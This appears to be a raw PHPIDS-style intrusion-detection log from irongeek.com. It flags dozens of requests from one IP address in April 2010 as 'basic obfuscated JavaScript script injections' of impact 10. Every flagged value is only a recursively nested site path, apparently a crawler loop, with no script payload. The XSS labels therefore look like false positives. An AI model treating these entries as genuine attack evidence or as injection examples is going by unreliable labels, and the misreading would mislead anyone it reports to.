Value:security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121562
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121563
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121564
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121565
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121566
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121567
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121568
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121569
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121570
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121571
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121572
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121573
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121574
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121547
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121548
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121549
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121550
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121551
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121552
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121553
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121554
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121555
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121556
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:11
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121543
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:10
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121544
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:10
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121545
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:10
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121546
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:10
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121529
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121530
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121531
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121532
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121533
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121534
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121535
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121536
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121537
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121538
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121539
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121540
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121541
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121542
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:09
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121515
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121516
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121517
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121518
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121519
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121520
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121521
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121522
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121523
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121524
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121525
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121526
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121527
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121528
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:08
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121497
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121498
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121499
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121500
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121501
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121502
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121503
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121504
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121505
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121506
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121507
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121508
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121509
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121510
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121511
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121512
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121513
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121514
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121481
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=advertise
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=advertise
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121482
Name:GET.page
Value:security/hackingillustrated/i.php?page=advertise
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=advertise
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121483
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121484
Name:GET.page
Value:security/hackingillustrated/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121485
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121486
Name:GET.page
Value:security/hackingillustrated/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121487
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
